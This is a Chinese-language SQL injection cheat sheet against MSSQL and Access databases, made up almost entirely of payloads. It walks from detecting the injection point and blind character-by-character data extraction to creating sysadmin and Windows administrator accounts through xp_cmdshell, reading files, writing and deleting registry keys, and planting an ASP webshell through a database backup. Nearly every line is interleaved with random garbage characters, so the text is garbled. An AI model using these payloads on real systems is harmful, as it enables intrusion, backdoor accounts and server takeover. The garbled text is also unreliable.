1.判断是否有注入;and 1=1 ;and 1=2 Trh
t2Iv
2.初步判断是否是mssql ;and user>0 Pq<43:*?
Eh;Ia6}
3.注入参数是字符'and [查询条件] and ''=' $:5h5Y#z
zUJXA:L9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' N)cODy([
En7+fQ
5.判断数据库系统 0^Ldw)C"
**__&Xp1
;and (select count(*) from sysobjects)>0 mssql i#YDdz
<H]PP6_g:
;and (select count(*) from msysobjects)>0 access ;DX{+Z[
Bn8&~
!lzj.|7=1
s[{8:Px
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Ay6T*Nu`
9nQyPb6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 A4l"^dZc
_:Q^mV=;j
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 b/*QV0(
q*R~gEi#yk
9.(1)猜字段的ascii值(access) ,B;mG]_
n%;qIKnIq\
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "?k'S{;
bS:$VyH6
(2)猜字段的ascii值(mssql) GB `n
} %0w25
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 *{5}m(5F
NM9ViYm>P
10.测试权限结构(mssql)
Rq| 5%;1
(421$w,B%
M6cybEk`
E l.eK9L
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- oIOeX1$V
B> i^ w1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- N%:uOX8{
Hh](n<Bs
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- kKbbsB
1G`5FU
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- o+OX^F0
*tZ3?X[b
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- UE_>@_T
BSy4
d>
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- :W&klUU"
GPAC0K^p
;and 1=(select IS_MEMBER('db_owner'));-- H"pYj
}T902RL0
"o;%em*Bc
J.2BBy
11.添加mssql和系统的帐户 Yy[=E\z
oIE(`l0l
;exec master.dbo.sp_addlogin username;-- y'f-4E<
;exec master.dbo.sp_password null,username,password;-- "AJ>pU3
hHw1<! M
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 8_>:0(y
;/m>c{
;exec master.dbo.xp_cmdshell 'net user username password WR.7%U';
S WsD]rn
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- gDfM} 2]/
3H"F~_H
;exec master.dbo.xp_cmdshell 'net user username password /add';-- zXGI{P0O
Q!~1Xc0S`p
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- -=rGN"(M
_
/s)It
)`5-rm~*
D//58z&
12.(1)遍历目录 ZQz;EV!
{XhpxJ__
;create table dirs(paths varchar(100), id int) !5m~qet.
h*P0;V`UX
;insert dirs exec master.dbo.xp_dirtree 'c:\' B7{j$0fm*
]6=opvm
;and (select top 1 paths from dirs)>0 g+.E=Ef8<4
aM[fag$c
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) &U.y):
H-5f!>)
e!i.u'z
=|- xj h
(2)遍历目录 ,aWfGh#$
nYRD>S?uz
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- <N80MUL|
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 *=E4|>Ul,
0\$Lnwp_
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 %ULd_ES^
"J
>,
Hr9
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 JLyFkV/
84Hm
PPt
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 WFeaX7\b
U8g?
q|D*H9[ke
CA"`7<,
13.mssql中的存储过程 n |,}
wAb_fU&*
xp_regenumvalues 注册表根键, 子键 y7*^H
|("5 :m
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 hW cM.
XnvaT(k7Y
xp_regread 根键,子键,键值名 m}
=<@b:l
+fIyeX
;exec xp_regread S
1Ji\
L?y,xA_
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 [7)#3
wVs |mG"
xp_regwrite 根键,子键, 值名, 值类型, 值 -gS/
]}0+7Q
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 M[T!AO-S$
p:U{3uN 62
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 3^&pb
] @1ncn7N
xp_regdeletevalue 根键,子键,值名 RzSN,bLR
0$nJd_gW_
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 U`'w{~"D%
!C0=
h
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 WUi7~Ei}
%}&9[#
z<P#djx
xhMdn3~U
14.mssql的backup创建webshell 2I39fZa
Y!s/uvRI
use model V'?nS&,i
5O%}.}n
create table cmd(str image); (C QgT3V
J.`.lQ$z
insert into cmd(str) values (''); CUw
9aH
ck<4_?1]
backup database model to disk='c:\l.asp'; ~GY;{
IWpUbD|kC
^jhHaN]G^
7y`~T+
15.mssql内置函数 2W~2Hk=0+%
]X _&
;and (select @@version)>0 获得Windows的版本号 j({L6</x
Ap> n4~
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Qg oXOVo6
eaiz
w@N
;and (select user_name())>0 爆当前系统的连接用户 ~d5{Q?T)
IX3U\_I#
;and (select db_name())>0 得到当前连接的数据库 x[oYN9O
>"nk}@
If#7SF)n'
1X9sx&5H
16.简洁的webshell 4Y/!V[
uc"u@ _M
use model wLUmRo56aR
ZyWC_r!
create table cmd(str image); O 1X
!
Hm^p^,}_x
insert into cmd(str) values (''); {S&&X&A`v
*AN#D?X_
backup database model to disk='g:\wwwtest\l.asp';